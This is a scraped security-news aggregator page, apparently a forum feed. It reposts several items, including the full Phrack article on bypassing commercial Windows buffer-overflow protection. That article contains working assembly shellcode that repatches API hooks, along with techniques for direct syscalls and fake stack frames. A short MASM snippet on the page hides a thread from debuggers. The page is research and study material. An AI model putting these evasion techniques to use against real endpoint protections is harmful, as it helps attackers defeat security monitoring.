http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies
  3. Enhanced Mitigation Experience Toolkit v3.5 Tech Preview A toolkit for deploying and configuring security mitigation technologies [TABLE=class: properties] [TR] [TD=class: col1]Version:[/TD] [TD=class: col2]3.5 Tech Preview[/TD] [TD=class: col3]Date published:[/TD] [TD=class: col4]7/25/2012[/TD] [/TR] [TR] [TD=class: col1]Language:[/TD] [TD=class: col234, colspan: 3] English[/TD] [/TR] [/TABLE] [TABLE=class: articles] [TR] [TD=class: col1]KB articles:[/TD] [TD=class: col234]KB2458544[/TD] [/TR] [/TABLE] [TABLE=class: files] [TR] [TH]File name[/TH] [TH]Size[/TH] [/TR] [TR] [TD=class: file-name]EMET Setup.msi[/TD] [TD=class: size]6.3 MB[/TD] [/TR] [/TABLE] Download: http://www.microsoft.com/en-us/download/details.aspx?id=30424 Info: The Enhanced Mitigation Experience Toolkit Detalii tehnice: EMET 3.5 Tech Preview leverages security mitigations from the BlueHat Prize - Security Research & Defense - Site Home - TechNet Blogs ----------------------------------------------------- Eu am in lista de aplicatii: - Flash Player (+ plugin container) - Java - Yahoo! Messenger - Firefox, Chrome, Opera, Internet Explorer - Adobe Reader - Word, Excel, PowerPoint, Outlook - VLC, Winamp + Altele Edit: Nu folositi pentru Yahoo! Messenger (cel putin nu toate optiunile), nu o sa porneasca
  4. Bypassing 3rd Party Windows Buffer Overflow Protection ==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10 |=-----------------------------------------------------------------------=| |=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=| |=-----------------------------------------------------------------------=| |=--------------=[ anonymous <p62_wbo_a@author.phrack.org ]=-------------=| |=--------------=[ Jamie Butler <james.butler@hbgary.com> ]=-------------=| |=--------------=[ anonymous <p62_wbo_b@author.phrack.org ]=-------------=| --[ Contents 1 - Introduction 2 - Stack Backtracing 3 - Evading Kernel Hooks 3.1 - Kernel Stack Backtracing 3.2 - Faking Stack Frames 4 - Evading Userland Hooks 4.1 - Implementation Problems - Incomplete API Hooking 4.1.1 - Not Hooking all API Versions 4.1.2 - Not Hooking Deeply Enough 4.1.3 - Not Hooking Thoroughly Enough 4.2 - Fun With Trampolines 4.2.1 Patch Table Jumping 4.2.2 Hook Hopping 4.3 - Repatching Win32 APIs 4.4 - Attacking Userland Components 4.4.1 IAT Patching 4.4.2 Data Section Patching 4.5 - Calling Syscalls Directly 4.6 - Faking Stack Frames 5 - Conclusions --[ 1 - Introduction Recently, a number of commercial security systems started to offer protection against buffer overflows. This paper analyzes the protection claims and describes several techniques to bypass the buffer overflow protection. Existing commercial systems implement a number of techniques to protect against buffer overflows. Currently, stack backtracing is the most popular one. It is also the easiest to implement and the easiest to bypass. Several commercial products such as Entercept (now NAI Entercept) and Okena (now Cisco Security Agent) implement this technique. --[ 2 - Stack Backtracing Most of the existing commercial security systems do not actually prevent buffer overflows but rather try to attempt to detect the execution of shellcode. The most common technology used to detect shellcode is code page permission checking which involves checking whether code is executing on a writable page of memory. This is necessary since architectures such as x86 do not support the non-executable memory bit. Some systems also perform additional checking to see whether code's page of memory belongs to a memory mapped file section and not to an anonymous memory section. [-----------------------------------------------------------] page = get_page_from_addr( code_addr ); if (page->permissions & WRITABLE) return BUFFER_OVERFLOW; ret = page_originates_from_file( page ); if (ret != TRUE) return BUFFER_OVERFLOW; [-----------------------------------------------------------] Pseudo code for code page permission checking Buffer overflow protection technologies (BOPT) that rely on stack backtracing don't actually create non-executable heap and stack segments. Instead they hook the OS and check for shellcode execution during the hooked API calls. Most operating systems can be hooked in userland or in kernel. Next section deals with evading kernel hooks, while section 4 deals with bypassing userland hooks. --[ 3 - Evading Kernel Hooks When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must be able to detect where a userland API call originated. Due to the heavy use of kernel32.dll and ntdll.dll libraries, an API call is usually several stack frames away from the actual syscall trap call. For this reason, some intrusion preventions systems rely on using stack backtracing to locate the original caller of a system call. ----[ 3.1 - Kernel Stack Backtracing While stack backtracing can occur from either userland or kernel, it is far more important for the kernel components of a BOPT than its userland components. The existing commercial BOPT's kernel components rely entirely on stack backtracing to detect shellcode execution. Therefore, evading a kernel hook is simply a matter of defeating the stack backtracing mechanism. Stack backtracing involves traversing stack frames and verifying that the return addresses pass the buffer overflow detection tests described above. Frequently, there is also an additional "return into libc" check, which involves checking that a return address points to an instruction immediately following a call or a jump. The basic operation of stack backtracing code, as used by a BOPT, is presented below. [-----------------------------------------------------------] while (is_valid_frame_pointer( ebp )) { ret_addr = get_ret_addr( ebp ); if (check_code_page(ret_addr) == BUFFER_OVERFLOW) return BUFFER_OVERFLOW; if (does_not_follow_call_or_jmp_opcode(ret_addr)) return BUFFER_OVERFLOW; ebp = get_next_frame( ebp ); } [-----------------------------------------------------------] Pseudo code for BOPT stack backtracing When discussing how to evade stack backtracing, it is important to understand how stack backtracing works on an x86 architecture. A typical stack frame looks as follows during a function call: : : |-------------------------| | function B parameter #2 | |-------------------------| | function B parameter #1 | |-------------------------| | return EIP address | |-------------------------| | saved EBP | |=========================| | function A parameter #2 | |-------------------------| | function A parameter #1 | |-------------------------| | return EIP address | |-------------------------| | saved EBP | |-------------------------| : : The EBP register points to the next stack frame. Without the EBP register it is very hard, if not impossible, to correctly identify and trace through all the stack frames. Modern compilers often omit the use of EBP as a frame pointer and use it as a general purpose register instead. With an EBP optimization, a stack frame looks as follows during a function call: |-----------------------| | function parameter #2 | |-----------------------| | function parameter #1 | |-----------------------| | return EIP address | |-----------------------| Notice that the EBP register is not present on the stack. Without an EBP register it is not possible for the buffer overflow detection technologies to accurately perform stack backtracing. This makes their task incredibly hard as a simple return into libc style attack will bypass the protection. Simply originating an API call one layer higher than the BOPT hook defeats the detection technique. ----[ 3.2 - Faking Stack Frames Since the stack is under complete control of the shellcode, it is possible to completely alter its contents prior to an API call. Specially crafted stack frames can be used to bypass the buffer overflow detectors. As was explained previously, the buffer overflow detector is looking for three key indicators of legitimate code: read-only page permissions, memory mapped file section and a return address pointing to an instruction immediately following a call or jmp. Since function pointers change calling semantics, BOPT do not (and cannot) check that a call or jmp actually points to the API being called. Most importantly, the BOPT cannot check return addresses beyond the last valid EBP frame pointer (it cannot stack backtrace any further). Evading a BOPT is therefore simply a matter of creating a "final" stack frame which has a valid return address. This valid return address must point to an instruction residing in a read-only memory mapped file section and immediately following a call or jmp. Provided that the dummy return address is reasonably close to a second return address, the shellcode can easily regain control. The ideal instruction sequence to point the dummy return address to is: [-----------------------------------------------------------] jmp [eax] ; or call [eax], or another register dummy_return: ... ; some number of nops or easily ; reversed instructions, e.g. inc eax ret ; any return will do, e.g. ret 8 [-----------------------------------------------------------] Bypassing kernel BOPT components is easy because they must rely on user controlled data (the stack) to determine the validity of an API call. By correctly manipulating the stack, it is possible to prematurely terminate the stack return address analysis. This stack backtracing evasion technique is also effective against userland hooks (see section 4.6). --[ 4 - Evading Userland Hooks Given the presence of the correct instruction sequence in a valid region of memory, it is possible to trivially bypass kernel buffer overflow protection techniques. Similar techniques can be used to bypass userland BOPT components. In addition, since the shellcode executes with the same permissions as the userland hooks, a number of other techniques can be used to evade the detection. ----[ 4.1 - Implementation Problems - Incomplete API Hooking There are many problems with the userland based buffer overflow protection technologies. For example, they require the buffer overflow protection code to be in the code path of all attacker's calls or the shellcode execution will go undetected. Trying to determine what an attacker will do with his or her shellcode a priori is an extremely hard problem, if not an impossible one. Getting on the right path is not easy. Some of the obstacles in the way include: a. Not accounting for both UNICODE and ANSI versions of a Win32 API call. b. Not following the chaining nature of API calls. For example, many functions in kernel32.dll are nothing more than wrappers for other functions within kernel32.dll or ntdll.dll. c. The constantly changing nature of the Microsoft Windows API. --------[ 4.1.1 - Not Hooking All API Versions A commonly encountered mistake with userland API hooking implementations is incomplete code path coverage. In order for an API interception based products to be effective, all APIs utilized by attackers must be hooked. This requires the buffer overflow protection technology to hook somewhere along the code path an attacker _has_ to take. However, as will be shown, once an attacker has begun executing code, it becomes very difficult for third party systems to cover all code paths. Indeed, no tested commercial buffer overflow detector actually provided an effective code path coverage. Many Windows API functions have two versions: ANSI and UNICODE. The ANSI function names usually end in A, and UNICODE functions end in W because of their wide character nature. The ANSI functions are often nothing more than wrappers that call the UNICODE version of the API. For example, CreateFileA takes the ANSI file name that was passed as a parameter and turns it into an UNICODE string. It then calls CreateFileW. Unless a vendor hooks both the UNICODE and ANSI version of the API function, an attacker can bypass the protection mechanism by simply calling the other version of the function. For example, Entercept 4.1 hooks LoadLibraryA, but it makes no attempt to intercept LoadLibraryW. If a protection mechanism was only going to hook one version of a function, it would make more sense to hook the UNICODE version. For this particular function, Okena/CSA does a better job by hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and LoadLibraryExW. Unfortunately for the third party buffer overflow detectors, simply hooking more functions in kernel32.dll is not enough. --------[ 4.1.2 - Not Hooking Deeply Enough In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll and yet many buffer overflow detection products do not hook functions within ntdll.dll. This simple error is similar to not hooking both the UNICODE and ANSI versions of a function. An attacker can simply call the ntdll.dll directly and completely bypass all the kernel32.dll "checkpoints" established by a buffer overflow detector. For example, NAI Entercept tries to detect shellcode calling GetProcAddress() in kernel32.dll. However, the shellcode can be rewritten to call LdrGetProcedureAddress() in ntdll.dll, which will accomplish the same goal, and at the same time never pass through the NAI Entercept hook. Similarly, shellcode can completely bypass userland hooks altogether and make system calls directly (see section 4.5). --------[ 4.1.3 - Not Hooking Thoroughly Enough The interactions between the various different Win32 API functions is byzantine, complex and difficult to understand. A vendor must make only one mistake in order to create a window of opportunity for an attacker. For example, Okena/CSA and NAI Entercept both hook WinExec trying to prevent attacker's shellcode from spawning a process. The call path for WinExec looks like this: WinExec() --> CreateProcessA() --> CreateProcessInternalA() Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA() (see Appendix A and . However, neither product hooks CreateProcessInternalA() (exported by kernel32.dll). When writing a shellcode, an attacker could find the export for CreateProcessInternalA() and use it instead of calling WinExec(). CreateProcessA() pushes two NULLs onto the stack before calling CreateProcessInternalA(). Thus a shellcode only needs to push two NULLs and then call CreateProcessInternalA() directly to evade the userland API hooks of both products. As new DLLs and APIs are released, the complexity of Win32 API internal interactions increases, making the problem worse. Third party product vendors are at a severe disadvantage when implementing their buffer overflow detection technologies and are bound to make mistakes which can be exploited by attackers. ----[ 4.2 - Fun With Trampolines Most Win32 API functions begin with a five byte preamble. First, EBP is pushed onto the stack, then ESP is moved into EBP. [-----------------------------------------------------------] Code Bytes Assembly 55 push ebp 8bec mov ebp, esp [-----------------------------------------------------------] Both Okena/CSA and Entercept use inline function hooking. They overwrite the first 5 bytes of a function with an immediate unconditional jump or call. For example, this is what the first few bytes of WinExec() look like after NAI Entercept's hooks have been installed: [-----------------------------------------------------------] Code Bytes Assembly e8 xx xx xx xx call xxxxxxxx 54 push esp 53 push ebx 56 push esi 57 push edi [-----------------------------------------------------------] Alternatively, the first few bytes could be overwritten with a jump instruction: [-----------------------------------------------------------] Code Bytes Assembly e9 xx xx xx xx jmp xxxxxxxx ... [-----------------------------------------------------------] Obviously, it is easy for shellcode to test for these and other signatures before calling a function. If a hijacking mechanism is detected, the shellcode can use several different techniques to bypass the hook. ------[ 4.2.1 - Patch Table Jumping When an API is hooked, the original preamble is saved into a table so that the buffer overflow detector can recreate the original API after performing its validation checks. The preamble is stored in a patch table, which resides somewhere in the address space of an application. When shellcode detects the presence of an API hook, it can simply search for the patch table and make its calls to patch table entries. This completely avoids the hook, preventing the userland buffer overflow detector components from ever being in the attacker's call path. ------[ 4.2.2 - Hook Hopping Alternatively, instead of locating the patch table, shellcode can include its own copy of the original pre-hook preamble. After executing its own API preamble, the shellcode can transfer execution to immediately after the API hook (function address plus five bytes). Since Intel x86 has variable length instructions, one must take this into account in order to land on an even instruction boundary: [-----------------------------------------------------------] Shellcode: call WinExecPreamble WinExecPreamble: push ebp mov ebp, esp sub esp, 54 jmp WinExec+6 [-----------------------------------------------------------] This technique will not work if another function within the call path is also hooked. In this case, Entercept also hooks CreateProcessA(), which WinExec() calls. Thus, to evade detection shellcode should call CreateProcessA() using the stored copy of CreateProcessA's preamble. ----[ 4.3 - Repatching Win32 APIs Thoroughly hooking Win32 APIs is not effective when certain fundamental errors are made in the implementation of a userland buffer overflow detection component. Certain implementations (NAI Entercept) have a serious problem with the way they perform their API hooking. In order to be able to overwrite preambles of hooked functions, the code section for a DLL has to be made writable. Entercept marks code sections of kernel32.dll and ntdll.dll as writable in order to be able to modify their contents. However, Entercept never resets the writable bit! Due to this serious security flaw, it is possible for an attacker to overwrite the API hook by re-injecting the original preamble code. For the WinExec() and CreateProcessA() examples, this would require overwriting the first 6 bytes (just to be instruction aligned) of WinExec() and CreateProcessA() with the original preamble. [-----------------------------------------------------------] WinExecOverWrite: Code Bytes Assembly 55 push ebp 8bec mov ebp, esp 83ec54 sub esp, 54 CreateProcessAOverWrite: Code Bytes Assembly 55 push ebp 8bec mov ebp, esp ff752c push DWORD PTR [ebp+2c] [-----------------------------------------------------------] This technique will not work against properly implemented buffer overflow detectors, however it is very effective against NAI Entercept. A complete shellcode example which overwrites the NAI Entercept hooks is presented below: [-----------------------------------------------------------] // This sample code overwrites the preamble of WinExec and // CreateProcessA to avoid detection. The code then // calls WinExec with a "calc.exe" parameter. // The code demonstrates that by overwriting function // preambles, it is able to evade Entercept and Okena/CSA // buffer overflow protection. _asm { pusha jmp JUMPSTART START: pop ebp xor eax, eax mov al, 0x30 mov eax, fs:[eax]; mov eax, [eax+0xc]; // We now have the module_item for ntdll.dll mov eax, [eax+0x1c] // We now have the module_item for kernel32.dll mov eax, [eax] // Image base of kernel32.dll mov eax, [eax+0x8] movzx ebx, word ptr [eax+3ch] // pe.oheader.directorydata[EXPORT=0] mov esi, [eax+ebx+78h] lea esi, [eax+esi+18h] // EBX now has the base module address mov ebx, eax lodsd // ECX now has the number of function names mov ecx, eax lodsd add eax,ebx // EDX has addresses of functions mov edx,eax lodsd // EAX has address of names add eax,ebx // Save off the number of named functions // for later push ecx // Save off the address of the functions push edx RESETEXPORTNAMETABLE: xor edx, edx INITSTRINGTABLE: mov esi, ebp // Beginning of string table inc esi MOVETHROUGHTABLE: mov edi, [eax+edx*4] add edi, ebx // EBX has the process base address xor ecx, ecx mov cl, BYTE PTR [ebp] test cl, cl jz DONESTRINGSEARCH STRINGSEARCH: // ESI points to the function string table repe cmpsb je Found // The number of named functions is on the stack cmp [esp+4], edx je NOTFOUND inc edx jmp INITSTRINGTABLE Found: pop ecx shl edx, 2 add edx, ecx mov edi, [edx] add edi, ebx push edi push ecx xor ecx, ecx mov cl, BYTE PTR [ebp] inc ecx add ebp, ecx jmp RESETEXPORTNAMETABLE DONESTRINGSEARCH: OverWriteCreateProcessA: pop edi pop edi push 0x06 pop ecx inc esi rep movsb OverWriteWinExec: pop edi push edi push 0x06 pop ecx inc esi rep movsb CallWinExec: push 0x03 push esi call [esp+8] NOTFOUND: pop edx STRINGEXIT: pop ecx popa; jmp EXIT JUMPSTART: add esp, 0x1000 call START WINEXEC: _emit 0x07 _emit 'W' _emit 'i' _emit 'n' _emit 'E' _emit 'x' _emit 'e' _emit 'c' CREATEPROCESSA: _emit 0x0e _emit 'C' _emit 'r' _emit 'e' _emit 'a' _emit 't' _emit 'e' _emit 'P' _emit 'r' _emit 'o' _emit 'c' _emit 'e' _emit 's' _emit 's' _emit 'A' ENDOFTABLE: _emit 0x00 WinExecOverWrite: _emit 0x06 _emit 0x55 _emit 0x8b _emit 0xec _emit 0x83 _emit 0xec _emit 0x54 CreateProcessAOverWrite: _emit 0x06 _emit 0x55 _emit 0x8b _emit 0xec _emit 0xff _emit 0x75 _emit 0x2c COMMAND: _emit 'c' _emit 'a' _emit 'l' _emit 'c' _emit '.' _emit 'e' _emit 'x' _emit 'e' _emit 0x00 EXIT: _emit 0x90 // Normally call ExitThread or something here _emit 0x90 } [-----------------------------------------------------------] ----[ 4.4 - Attacking Userland Components While evading the hooks and techniques used by userland buffer overflow detector components is effective, there exist other mechanisms of bypassing the detection. Because both the shellcode and the buffer overflow detector are executing with the same privileges and in the same address space, it is possible for shellcode to directly attack the buffer overflow detector userland component. Essentially, when attacking the buffer overflow detector userland component the attacker is attempting to subvert the mechanism used to perform the shellcode detection check. There are only two principle techniques for shellcode validation checking. Either the data used for the check is determined dynamically during each hooked API call, or the data is gathered at process start up and then checked during each call. In either case, it is possible for an attacker to subvert the process. ------[ 4.4.1 - IAT Patching Rather than implementing their own versions of memory page information functions, the commercial buffer overflow protection products simply use the operating system APIs. In Windows NT, these are implemented in ntdll.dll. These APIs will be imported into the userland component (itself a DLL) via its PE Import Table. An attacker can patch vectors within the import table to alter the location of an API to a function supplied by the shellcode. By supplying the function used to do the validation checking by the buffer overflow detector, it is trivial for an attacker to evade detection. ------[ 4.4.2 - Data Section Patching For various reasons, a buffer overflow detector might use a pre-built list of page permissions within the address space. When this is the case, altering the address of the VirtualQuery() API is not effective. To subvert the buffer overflow detector, the shellcode has to locate and modify the data table used by the return address validation routines. This is a fairly straightforward, although application specific, technique for subverting buffer overflow prevention technologies. ----[ 4.5 - Calling Syscalls Directly As mentioned above, rather than using ntdll.dll APIs to make system calls, it is possible for an attacker to create shellcode which makes system call directly. While this technique is very effective against userland components, it obviously cannot be used to bypass kernel based buffer overflow detectors. To take advantage of this technique you must understand what parameters a kernel function uses. These may not always be the same as the parameters required by the kernel32 or ntdll API versions. Also, you must know the system call number of the function in question. You can find this dynamically using a technique similar to the one to find function addresses. Once you have the address of the ntdll.dll version of the function you want to call, index into the function one byte and read the following DWORD. This is the system call number in the system call table for the function. This is a common trick used by rootkit developers. Here is the pseudo code for calling NtReadFile system call directly: ... xor eax, eax // Optional Key push eax // Optional pointer to large integer with the file offset push eax push Length_of_Buffer push Address_of_Buffer // Before call make room for two DWORDs called the IoStatusBlock push Address_of_IoStatusBlock // Optional ApcContext push eax // Optional ApcRoutine push eax // Optional Event push eax // Required file handle push hFile // EAX must contain the system call number mov eax, Found_Sys_Call_Num // EDX needs the address of the userland stack lea edx, [esp] // Trap into the kernel // (recent Windows NT versions use "sysenter" instead) int 2e ----[ 4.6 - Faking Stack Frames As described in section 3.2, kernel based stack backtracing can be bypassed using fake frames. Same techniques works against userland based detectors. To bypass both userland and kernel backtracing, shellcode can create a fake stack frame without the ebp register on stack. Since stack backtracing relies on the presence of the ebp register to find the next stack frame, fake frames can stop backtracing code from tracing past the fake frame. Of course, generating a fake stack frame is not going to work when the EIP register still points to shellcode which resides in a writable memory segment. To bypass the protection code, shellcode needs to use an address that lies in a non-writable memory segment. This presents a problem since shellcode needs a way to eventually regain control of the execution. The trick to regaining control is to proxy the return to shellcode through a "ret" instruction which resides in a non-writable memory segment. "ret" instruction can be found dynamically by searching memory for a 0xC3 opcode. Here is an illustration of a normal LoadLibrary("kernel32.dll") call that originates from a writable memory segment: push kernel32_string call LoadLibrary return_eip: . . . LoadLibrary: ; * see below for a stack illustration . . . ret ; return to stack-based return_eip |------------------------------| | address of "kernel32.dll" str| |------------------------------| | return address (return_eip) | |------------------------------| As explained before, the buffer overflow protection code executes before LoadLibrary gets to run. Since the return address (return_eip) is in a writable memory segment, the protection code logs the overflow and terminates the process. Next example illustrates 'proxy through a "ret" instruction' technique: push return_eip push kernel32_string ; fake "call LoadLibrary" call push address_of_ret_instruction jmp LoadLibrary return_eip: . . . LoadLibrary: ; * see below for a stack illustration . . . ret ; return to non stack-based address_of_ret_instruction address_of_ret_instruction: . . . ret ; return to stack-based return_eip Once again, the buffer overflow protection code executes before LoadLibrary gets to run. This time though, the stack is setup with a return address pointing to a non-writable memory segment. In addition, the ebp register is not present on stack thus the protection code cannot perform stack backtracing and determine that the return address in the next stack frame points to a writable segment. This allows the shellcode to call LoadLibrary which returns to the "ret" instruction. In its turn, the "ret" instruction pops the next return address off stack (return_eip) and transfers control to it. |------------------------------| | return address (return_eip) | |------------------------------| | address of "kernel32.dll" str| |------------------------------| | address of "ret" instruction | |------------------------------| In addition, any number of arbitrary complex fake stack frames can be setup to further confuse the protection code. Here is an example of a fake frame that uses a "ret 8" instruction instead of simple "ret": |--------------------------------| | return address | |--------------------------------| | address of "ret" instruction | <- fake frame 2 |--------------------------------| | any value | |--------------------------------| | address of "kernel32.dll" str | |--------------------------------| | address of "ret 8" instruction | <- fake frame 1 |--------------------------------| This causes an extra 32-bit value to be removed from stack, complicating any kind of analysis even further. --[ 5 - Conclusions The majority of commercial security systems do not actually prevent buffer overflows but rather detect the execution of shellcode. The most common technology used to detect shellcode is code page permission checking which relies on stack backtracing. Stack backtracing involves traversing stack frames and verifying that the return addresses do not originate from writable memory segments such as stack or heap areas. The paper presents a number of different ways to bypass both userland and kernel based stack backtracing. These range from tampering with function preambles to creating fake stack frames. In conclusion, the majority of current buffer overflow protection implementations are flawed, providing a false sense of security and little real protection against determined attackers. Appendix A: Entercept 4.1 Hooks Entercept hooks a number of functions in userland and in the kernel. Here is a list of the currently hooked functions as of Entercept 4.1. User Land msvcrt.dll _creat _read _write system kernel32.dll CreatePipe CreateProcessA GetProcAddress GetStartupInfoA LoadLibraryA PeekNamedPipe ReadFile VirtualProtect VirtualProtectEx WinExec WriteFile advapi32.dll RegOpenKeyA rpcrt4.dll NdrServerInitializeMarshall user32.dll ExitWindowsEx ws2_32.dll WPUCompleteOverlappedRequest WSAAddressToStringA WSACancelAsyncRequest WSACloseEvent WSAConnect WSACreateEvent WSADuplicateSocketA WSAEnumNetworkEvents WSAEventSelect WSAGetServiceClassInfoA WSCInstallNameSpace wininet.dll InternetSecurityProtocolToStringW InternetSetCookieA InternetSetOptionExA lsasrv.dll LsarLookupNames LsarLookupSids2 msv1_0.dll Msv1_0ExportSubAuthenticationRoutine Msv1_0SubAuthenticationPresent Kernel NtConnectPort NtCreateProcess NtCreateThread NtCreateToken NtCreateKey NtDeleteKey NtDeleteValueKey NtEnumerateKey NtEnumerateValueKey NtLoadKey NtLoadKey2 NtQueryKey NtQueryMultipleValueKey NtQueryValueKey NtReplaceKey NtRestoreKey NtSetValueKey NtMakeTemporaryObject NtSetContextThread NtSetInformationProcess NtSetSecurityObject NtTerminateProcess Appendix B: Okena/Cisco CSA 3.2 Hooks Okena/CSA hooks many functions in userland but many less in the kernel. A lot of the userland hooks are the same ones that Entercept hooks. However, almost all of the functions Okena/CSA hooks in the kernel are related to altering keys in the Windows registry. Okena/CSA does not seem as concerned as Entercept about backtracing calls in the kernel. This leads to an interesting vulnerability, left as an exercise to the reader. User Land kernel32.dll CreateProcessA CreateProcessW CreateRemoteThread CreateThread FreeLibrary LoadLibraryA LoadLibraryExA LoadLibraryExW LoadLibraryW LoadModule OpenProcess VirtualProtect VirtualProtectEx WinExec WriteProcessMemory ole32.dll CoFileTimeToDosDateTime CoGetMalloc CoGetStandardMarshal CoGetState CoResumeClassObjects CreateObjrefMoniker CreateStreamOnHGlobal DllGetClassObject StgSetTimes StringFromCLSID oleaut32.dll LPSAFEARRAY_UserUnmarshal urlmon.dll CoInstall Kernel NtCreateKey NtOpenKey NtDeleteKey NtDeleteValueKey NtSetValueKey NtOpenProcess NtWriteVirtualMemory |=[ EOF ]=---------------------------------------------------------------=| Sursa: .:: Phrack Magazine ::.
  5. Security Mitigations for Return-Oriented Programming Attacks Piotr Bania Kryptos Logic Research KryptosLogic 2010 Abstract With the discovery of new exploit techniques, new protection mechanisms are needed as well. Mitigations like DEP (Data Execution Prevention) or ASLR (Address Space Layout Randomization) created a significantly more difficult environment for vulnerability exploitation. Attackers, however, have recently developed new exploitation methods which are capable of bypassing the operating system’s security protection mechanisms. In this paper we present a short summary of novel and known mitigation techniques against return-oriented programming (ROP) attacks. The techniques described in this article are related mostly to x86-321 processors and Microsoft Windows operating systems. Download: kryptoslogic.com/download/ROP_Whitepaper.pdf
  6. The Tor Software Ecosystem Description: THE TOR SOFTWARE ECOSYSTEM At the very beginning, Tor was just a socks proxy that protected the origin and/or destination of your TCP flows. Now the broader Tor ecosystem includes a diverse set of projects -- browser extensions to patch Firefox and Thunderbird's privacy issues, Tor controller libraries to let you interface with the Tor client in your favorite language, network scanners to measure relay performance and look for misbehaving exit relays, LiveCDs, support for the way Android applications expect Tor to behave, full-network simulators and testing frameworks, plugins to make Tor's traffic look like Skype or other protocols, and metrics and measurement tools to keep track of how well everything's working. Many of these tools aim to be useful beyond Tor: making them modular means they're reusable for other anonymity and security projects as well. In this talk, Roger and Jake will walk you through all the tools that make up the Tor software world, and give you a better understanding of which ones need love and how you can help. At the very beginning, Tor was just a socks proxy that protected the origin and/or destination of your TCP flows. Now the broader Tor ecosystem includes a diverse set of projects -- browser extensions to patch Firefox and Thunderbird's privacy issues, Tor controller libraries to let you interface with the Tor client in your favorite language, network scanners to measure relay performance and look for misbehaving exit relays, LiveCDs, support for the way Android applications expect Tor to behave, full-network simulators and testing frameworks, plugins to make Tor's traffic look like Skype or other protocols, and metrics and measurement tools to keep track of how well everything's working. Many of these tools aim to be useful beyond Tor: making them modular means they're reusable for other anonymity and security projects as well. In this talk, Roger and Jake will walk you through all the tools that make up the Tor software world, and give you a better understanding of which ones need love and how you can help. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: The Tor Software Ecosystem
  7. Static Analysis Of Java Class Files For Quickly And Accurately Detecting Web Description: Abstract Attacks such as Cross-Site Scripting, HTTP header injection, and SQL injection take advantage of weaknesses in the way some web applications handle incoming character strings. One technique for defending against injection vulnerabilities is to sanitize untrusted strings using encoding methods. These methods convert the reserved characters in a string to an inert representation which prevents unwanted side effects. However, encoding methods which are insufficiently thorough or improperly integrated into applications can pose a significant security risk. This paper will outline an algorithm for identifying encoding methods through automated analysis of Java bytecode. The approach combines an efficient heuristic search with selective rebuilding and execution of likely candidates. This combination provides a scalable and accurate technique for identifying and profiling code that could constitute a serious weakness in an application. ***** Speakers Arshan Dabirsiaghi. Aspect Security Matthew Paisner, Aspect Security Alex Emsellem, Intern Software Engineer, Aspect Security Intern Software Engineer, Aspect Security Currently pursuing a bachelor's degree in Computer Science. I'm primarily focused on software reverse engineering and exploitation. Around ten years ago I found my first vulnerability in a web application, and remember it vividly. I live for innovative ideas and the cutting-edge. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Static Analysis of Java Class Files for Quickly and Accurately Detecting Web-Language Encoding Methods on Vimeo Sursa: Static Analysis Of Java Class Files For Quickly And Accurately Detecting Web
  8. Wtf - Waf Testing Framework Description: Abstract We will be presenting a new approach to evaluating web application firewall capabilities that is suitable to the real world use case. Our methodology touches on issues like False Positive / False Negative rates, evasion techniques and white listing / black listing balance. We will demonstrate a tool that can be used by organizations to implement the methodology either when choosing an application protection solution or after deployment. ***** Speakers Yaniv Azaria, Security Research Team Leader, Impervia Inc. Yaniv holds a B.Sc and M.Sc in Computer Science. An industry veteran with experience in developing web applications, bio-informatic algorithms and database security products. Was team leader for database security research in Imperva for 3 years and for the past couple of years conducts general database and application security research in general. Amichai Shulman, Co-Founder and CTO of Impervia, Inc. Co-founder and CTO of Imperva Inc with 20 years of information security experience in the military and corporate world. Leading our research group in the areas of vulnerability research as well as hacker intelligence. Holds B.Sc and M.Sc in Computer Science. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: WTF - WAF Testing Framework - Yaniv Azaria and Amichai Shulman on Vimeo Sursa: Wtf - Waf Testing Framework
  9. [h=1]Undocumented API use - NtSetInformationThread[/h]Author: [h=1]drew77[/h] ; Use of the still undocumented NtSetInformationThread. ; .386 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\advapi32.inc include \masm32\include\ntdll.inc include \masm32\macros\macros.asm includelib \masm32\lib\kernel32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\advapi32.lib includelib \masm32\lib\ntdll.lib .data Failed db "Busted.",0 Sample db " ",0 .code start: ; When the function is called, the thread will continue to ; run but a debugger will no longer receive any events ; related to that thread. Among the missing events are that ; the process has terminated, if the main thread is the ; hidden one. This technique is used by ; HyperUnpackMe2, among others. invoke NtSetInformationThread,-2,11h,NULL,NULL ; as of Saturday, January 12, 2013, STILL undocumented ; Details at hxxp://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Thread/NtSetInformationThread.html ;thread detached if debugged ;invoke MessageBox, 0, ADDR Failed, ADDR Sample,MB_ICONINFORMATION invoke ExitProcess,0 end start Sursa: Undocumented API use - NtSetInformationThread - rohitab.com - Forums
  10. Packet Fence 3.6.1 Site packetfence.org PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans. Download: http://packetstormsecurity.com/files/download/119507/packetfence-3.6.1.tar.gz Sursa: Packet Fence 3.6.1 ? Packet Storm
